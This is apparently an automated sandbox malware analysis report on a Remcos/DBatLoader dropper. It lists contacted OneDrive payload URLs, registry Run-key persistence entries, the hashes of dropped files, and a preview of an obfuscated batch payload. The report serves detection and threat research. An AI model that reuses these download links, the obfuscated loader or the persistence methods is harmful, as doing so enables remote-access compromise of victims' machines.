                            https://sectigo.com/CPS0udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://ocsp.sectigo.com0udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://geoplugin.net/json.gp/CudVh4Ist4Z.exe, 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmptrue
                            • URL Reputation: phishing
                            		unknown
                            https://xirfeg.sn.files.1drv.com/y4mQLd7Jb4tXEApwTb1qUvLYu4AYaX9rqayqbrqvAn-5-ThXvkZfJF26xlkeR3Ny-gJXjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000939000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://live.com/udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000072A000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000939000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 0000000F.00000003.2559378885.000000000076D000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://xirfeg.sn.files.1drv.com/y4mf57oWea_lC5UFEW7heHii22ItiVRqzOkuZoz6yyafu_P62cjXQyR0S8WE0jPq8GhXjfxsfmn.PIF, 0000000F.00000002.2560602263.0000000000772000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://xirfeg.sn.files.1drv.com/udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000072A000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000939000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 0000000F.00000003.2559378885.000000000076D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://xirfeg.sn.files.1drv.com:443/y4mmJkpN2-URpDPce1turH6bNoPZHs8qohGTBPPgUSqUu1WeGjpTknCmr6n8UWtudVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000071C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.pmail.comremcos.exe, remcos.exe, 0000000C.00000000.2337823304.0000000000416000.00000002.00000001.01000000.00000007.sdmp, remcos.exe, 0000000C.00000002.2338890937.0000000000416000.00000002.00000001.01000000.00000007.sdmp, remcos.exe, 0000000D.00000000.2418876564.0000000000416000.00000002.00000001.01000000.00000007.sdmp, remcos.exe, 0000000D.00000002.2442004580.0000000000416000.00000002.00000001.01000000.00000007.sdmp, nmfsxfjX.pif, 00000010.00000000.2558844631.0000000000416000.00000002.00000001.01000000.00000006.sdmp, remcos.exe, 00000011.00000002.2566375553.0000000000416000.00000002.00000001.01000000.00000009.sdmp, remcos.exe, 00000011.00000000.2565214757.0000000000416000.00000002.00000001.01000000.00000009.sdmp, remcos.exe, 00000012.00000002.2620397438.0000000000416000.00000002.00000001.01000000.00000009.sdmp, remcos.exe, 00000012.00000000.2619943576.0000000000416000.00000002.00000001.01000000.00000009.sdmp, remcos.exe.10.dr, remcos.exe.6.dr, nmfsxfjX.pif.0.drfalse
                                        		high
                                        http://ocsp.sectigo.com0CudVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://onedrive.live.com/download?resid=9ADCDEDB531E38FE%21107&authkey=Xjfxsfmn.PIF, 0000000F.00000002.2569407559.00000000141B2000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          https://xirfeg.sn.files.1drv.com:443/y4mQLd7Jb4tXEApwTb1qUvLYu4AYaX9rqayqbrqvAn-5-ThXvkZfJF26xlkeR3NXjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000939000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://onedrive.live.com/udVh4Ist4Z.exe, 00000000.00000002.2140385254.0000000000702000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 00000008.00000003.2293558943.00000000008D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              13.107.137.11
                                              		dual-spov-0006.spov-msedge.netUnited States
                                              		8068MICROSOFT-CORP-MSN-AS-BLOCKUStrue

                                              General Information

                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1430910
                                              Start date and time:2024-04-24 10:58:07 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 57s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:19
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:udVh4Ist4Z.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:2cc30d206669699e58870623365fef82.exe
                                              Detection:MAL
                                              Classification:mal100.rans.troj.spyw.expl.evad.winEXE@24/14@4/1
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 68
                                              • Number of non-executed functions: 261
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded IPs from analysis (whitelisted): 13.107.42.12
                                              • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, client.wns.windows.com, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-sn-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, odc-sn-files-geo.onedrive.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              10:58:56API Interceptor2x Sleep call for process: udVh4Ist4Z.exe modified
                                              10:59:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Xjfxsfmn C:\Users\Public\Xjfxsfmn.url
                                              10:59:13API Interceptor2x Sleep call for process: Xjfxsfmn.PIF modified
                                              10:59:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1 "C:\ProgramData\Remcos\remcos.exe"
                                              10:59:21AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1 "C:\ProgramData\Remcos\remcos.exe"
                                              10:59:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Xjfxsfmn C:\Users\Public\Xjfxsfmn.url
                                              10:59:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1 "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              13.107.137.11Payment Remittance Advice_000000202213.xlsbGet hashmaliciousUnknownBrowse
                                              • onedrive.live.com/download?cid=64F8294A00286885&resid=64F8294A00286885%21770&authkey=ABI3zrc6BsVUKxU

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              dual-spov-0006.spov-msedge.netURGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 13.107.139.11
                                              OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 13.107.137.11
                                              fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 13.107.139.11
                                              FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                              • 13.107.139.11
                                              HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 13.107.137.11
                                              payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 13.107.137.11
                                              VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 13.107.139.11
                                              pSfqOmM1DG.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 13.107.137.11
                                              https://1drv.ms/o/s!BDwGtOL3Ob0ShA6L6a7ghGOEVOBw?e=-nVgacgL8k2GcXGT6ejjHg&at=9%22)%20and%20ContentType:(%221%22)Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                              • 13.107.139.11
                                              UGS - CRO REQ - KHIDUBAI (OPL-841724).scrGet hashmaliciousPureLog Stealer, zgRATBrowse
                                              • 13.107.137.11

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              MICROSOFT-CORP-MSN-AS-BLOCKUSsamradapps_datepicker_221114.xlamGet hashmaliciousUnknownBrowse
                                              • 13.107.246.69
                                              IPrstVM17M.exeGet hashmaliciousUnknownBrowse
                                              • 52.173.151.229
                                              https://220420241.blob.core.windows.net/web/index.html?id=999Get hashmaliciousUnknownBrowse
                                              • 20.150.111.100
                                              URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 13.107.139.11
                                              https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                              • 13.107.213.69
                                              OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 13.107.137.11
                                              #U5c97#U4f4d#U8865#U52a9#U5236#U5ea6.docx.docGet hashmaliciousUnknownBrowse
                                              • 52.184.66.142
                                              fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 13.107.139.11
                                              Payment MT103.xlsGet hashmaliciousUnknownBrowse
                                              • 13.107.246.69
                                              Ref_Order04.xlsGet hashmaliciousUnknownBrowse
                                              • 13.107.213.69

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              a0e9f5d64349fb13191bc781f81f42e1samradapps_datepicker_221114.xlamGet hashmaliciousUnknownBrowse
                                              • 13.107.137.11
                                              Enquiry 230424.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 13.107.137.11
                                              URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 13.107.137.11
                                              fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 13.107.137.11
                                              Payment MT103.xlsGet hashmaliciousUnknownBrowse
                                              • 13.107.137.11
                                              Ref_Order04.xlsGet hashmaliciousUnknownBrowse
                                              • 13.107.137.11
                                              FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                              • 13.107.137.11
                                              OHkRFujs2m.exeGet hashmaliciousUnknownBrowse
                                              • 13.107.137.11
                                              file.exeGet hashmaliciousRisePro StealerBrowse
                                              • 13.107.137.11
                                              z56NF-Faturada-23042024.msiGet hashmaliciousMicroClipBrowse
                                              • 13.107.137.11

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\ProgramData\Remcos\remcos.exeFT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                ORDER-CONFIRMATION-DETAILS-000235374564.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                  RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                    20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                      disktop.pif.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                        82__GT7568.PDF.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                          SecuriteInfo.com.Win32.Evo-gen.25660.20544.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                            SecuriteInfo.com.Win32.Evo-gen.15258.6765.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                              rKjlbIeOH9.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                CONFIRMATION ORDER1.batGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                  C:\Users\Public\Libraries\easinvoker.exeEnquiry 230424.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                    URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                      OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                        fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                          FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                            HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                              payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                  SecuriteInfo.com.Win32.RATX-gen.9491.24773.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                    Purchase order.exeGet hashmaliciousRemcos, DBatLoaderBrowse

                                                                                      Created / dropped Files

                                                                                      C:\ProgramData\Remcos\Loader.Log

                                                                                      Download File
                                                                                      Process:C:\ProgramData\Remcos\remcos.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):42
                                                                                      Entropy (8bit):4.51089956542986
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:+Vu9R2cpf2gwn:+VaRdNpw
                                                                                      MD5:1E4CBA71ADCC3C10D024A3241C684067
                                                                                      SHA1:C8FAC6308279D1E93160FDD751214FE72A2876E9
                                                                                      SHA-256:1B8AB853C5977B486BBD2797D8E03C1D5AC25C7C295497A30883CCE98D6BC98C
                                                                                      SHA-512:6025751C63B451BBCAE1FD36626274BC7F7416354B2E09AE9273BD4BF13F76B50EE56FEDD559468B1131A6A1E29F00750253FE03D7E8C5A78463DBE8DA545264
                                                                                      Malicious:false
                                                                                      Preview:24-04-24.1059: Mercury/32 Loader Started..

                                                                                      C:\ProgramData\Remcos\remcos.exe

                                                                                      Download File
                                                                                      Process:C:\Users\Public\Libraries\nmfsxfjX.pif
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):68096
                                                                                      Entropy (8bit):6.328046551801531
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                      MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                      SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                      SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                      SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                      Joe Sandbox View:
                                                                                      • Filename: FT. 40FE CNY .xlsx.lnk, Detection: malicious, Browse
                                                                                      • Filename: ORDER-CONFIRMATION-DETAILS-000235374564.cmd, Detection: malicious, Browse
                                                                                      • Filename: RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ, Detection: malicious, Browse
                                                                                      • Filename: 20240416-703661.cmd, Detection: malicious, Browse
                                                                                      • Filename: disktop.pif.exe, Detection: malicious, Browse
                                                                                      • Filename: 82__GT7568.PDF.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.Win32.Evo-gen.25660.20544.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.Win32.Evo-gen.15258.6765.exe, Detection: malicious, Browse
                                                                                      • Filename: rKjlbIeOH9.exe, Detection: malicious, Browse
                                                                                      • Filename: CONFIRMATION ORDER1.bat, Detection: malicious, Browse
                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

                                                                                      C:\Users\Public\Libraries\Null

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\udVh4Ist4Z.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5
                                                                                      Entropy (8bit):1.9219280948873623
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:MVy:Ms
                                                                                      MD5:B8A4F2F99C387B80CDA72F6B43079B8B
                                                                                      SHA1:A2281BBFE78D4F0D6FC03B4799FFD5D010997B13
                                                                                      SHA-256:90B53DF56816C127246136D4403ABA3B26CEC599B2B950FB2BA78D6C1FB4E6BF
                                                                                      SHA-512:413F0252867E18DD1F009F10018578790F9BFBE252B27FCC6452CB8B03E46CCAA251A9FF15CD962A45EA03469BBC7B1867A38A6F37EABEDAC29184AF5860501A
                                                                                      Malicious:false
                                                                                      Preview:100..

                                                                                      C:\Users\Public\Libraries\Xjfxsfmn.PIF

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1639424
                                                                                      Entropy (8bit):7.422853453364174
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:7MkT4gLKu9KKozJQd/HJNRO/BhM6wIJp4m+3bu8U2flxAv:QkTpT9K1mzyhM6wW4mEQ2W
                                                                                      MD5:2CC30D206669699E58870623365FEF82
                                                                                      SHA1:DE5E70F094D0B72660AA57B87667EDD9D52971FC
                                                                                      SHA-256:42AC8E7E9DF9877AF1382F5626FD74E63210D307F6D577CD5B387FFD0C9520BD
                                                                                      SHA-512:2F1F275B9A928844D8F97DC07AA4D0F53DA61FD06A507424A873BA128E71D2754E710DBEBE1935ADC3DADA94B42417B1FC30A1915A40B2CFFC655C55D7C62005
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                                                      • Antivirus: Virustotal, Detection: 66%, Browse
                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................h...........u............@..............................................@......................x.......f ...........................@..(c...........................0......................................................CODE.....f.......h.................. ..`DATA.....G.......H...l..............@...BSS.....]................................idata..f ......."..................@....edata..x...........................@..P.tls......... ...........................rdata.......0......................@..P.reloc..(c...@...d..................@..P.rsrc................>..............@..P....................................@..P................................................................................................

                                                                                      C:\Users\Public\Libraries\XjfxsfmnO.bat

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\udVh4Ist4Z.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (15012), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):30026
                                                                                      Entropy (8bit):3.9380000056299878
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:IBOY7cKQ/CyntVZjpubO0bXWQtagxP2+3o5WIGbfJTAy:C
                                                                                      MD5:828FFBF60677999579DAFE4BF3919C63
                                                                                      SHA1:A0D159A1B9A49E9EACCC53FE0C3266C0526A1BDC
                                                                                      SHA-256:ABAC4A967800F5DA708572EC42441EC373CD52459A83A8A382D6B8579482789D
                                                                                      SHA-512:BF00909E24C5A6FB2346E8457A9ADACD5F1B35988D90ABBDE9FF26896BBB59EDAFEA60D9DB4D10182A7B5E129BB69585D3E20BC5C63AF3517B3A7EF1E45FFB7E
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: MALWARE_BAT_KoadicBAT, Description: Koadic post-exploitation framework BAT payload, Source: C:\Users\Public\Libraries\XjfxsfmnO.bat, Author: ditekSHen
                                                                                      Preview:..&@cls&@set "_...=H zAnOeUIivpoS3l71mXMxw8yaqYTEuKgFGPJZRfr@k6Wj9sbQB4VtLD2d0C5Nch"..%_...:~41,1%%_...:~47,1%%_...:~6,1%%_...:~53,1%%_...:~1,1%"_...=%_...:~10,1%%_...:~39,1%%_...:~16,1%%_...:~13,1%%_...:~25,1%%_...:~53,1%%_...:~42,1%%_...:~22,1%%_...:~18,1%%_...:~48,1%%_...:~51,1%%_...:~2,1%%_...:~61,1%%_...:~9,1%%_...:~19,1%%_...:~44,1%%_...:~50,1%%_...:~57,1%%_...:~26,1%%_...:~4,1%%_...:~62,1%%_...:~3,1%%_...:~33,1%%_...:~38,1%%_...:~40,1%%.......%%_...:~60,1%%_...:~0,1%%_...:~43,1%%_...:~34,1%%_...:~58,1%%_...:~15,1%%_...:~7,1%%_...:~20,1%%_...:~49,1%%_...:~35,1%%_...:~14,1%%_...:~30,1%%_...:~36,1%%_...:~41,1%%_...:~45,1%%_...:~11,1%%_...:~55,1%%_...:~32,1%%_...:~17,1%%_...:~63,1%%_...:~56,1%%_...:~21,1%%_...:~37,1%%_...:~8,1%%_...:~54,1%%_...:~28,1%%_...:~6,1%%.......%%_...:~5,1%%_...:~59,1%%_...:~52,1%%_...:~29,1%%_...:~24,1%%_...:~12,1%%_...:~46,1%%_...:~47,1%%_...:~1,1%%_...:~23,1%%_...:~27,1%%_...:~31,1%"..%_...:~38,1%%_...:~59,1%%_...:~51,1%%_...:~5,1%%_...:~60,1%"_....=%_...

                                                                                      C:\Users\Public\Libraries\aaa.bat

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\udVh4Ist4Z.exe
                                                                                      File Type:DOS batch file, ASCII text, with very long lines (468), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):3646
                                                                                      Entropy (8bit):5.383959173452972
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:Zx2A0d5a9zHPwo0uP6SXjr4XtgPmon38JV7ZVhvoXS966hYxcdF4AlM5NQYE2Pl+:3L6jThc/pkmZAXpA2
                                                                                      MD5:71E46EFE9932B83B397B44052513FB49
                                                                                      SHA1:741AF3B8C31095A0CC2C39C41E62279684913205
                                                                                      SHA-256:11C20FABF677CD77E8A354B520F6FFCA09CAC37CE15C9932550E749E49EFE08A
                                                                                      SHA-512:76DA3B441C0EAAAABDD4D21B0A3D4AA7FD49D73A5F0DAB2CFB39F2E114EFE4F4DABE2D46B01B66D810D6E0EFA97676599ECE5C213C1A69A5F2F4897A9B4AC8DA
                                                                                      Malicious:false
